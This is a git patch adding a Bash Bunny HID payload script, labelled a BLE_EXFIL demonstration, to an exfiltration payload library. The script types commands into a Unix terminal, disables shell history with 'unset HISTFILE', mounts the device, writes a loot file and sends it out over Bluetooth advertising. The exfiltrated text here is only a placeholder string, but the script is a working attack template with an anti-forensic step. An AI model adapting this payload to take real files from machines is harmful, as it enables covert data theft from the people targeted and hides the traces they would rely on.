From c00d27240b5796fcbe4a0ff28e59c190421241ef Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Sat, 30 Apr 2022 08:58:53 +0530 Subject: [PATCH] BLE_EXFIL demo --- .../exfiltration/BLE_EXFIL_DEMO/payload.txt | 47 +++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt diff --git a/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt b/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt new file mode 100644 index 00000000..35e9dcac --- /dev/null +++ b/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt @@ -0,0 +1,47 @@ +# Description: Demonstration of BLE_EXFIL extension. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Exfiltration +# Target: Unix-like operating systems. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [Advertising Data] +Q STRING echo BashBunnyRocks \> '$mntt'/loot/ble_exfil.txt +Q ENTER +BLE_EXFIL +Q DELAY 200 +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH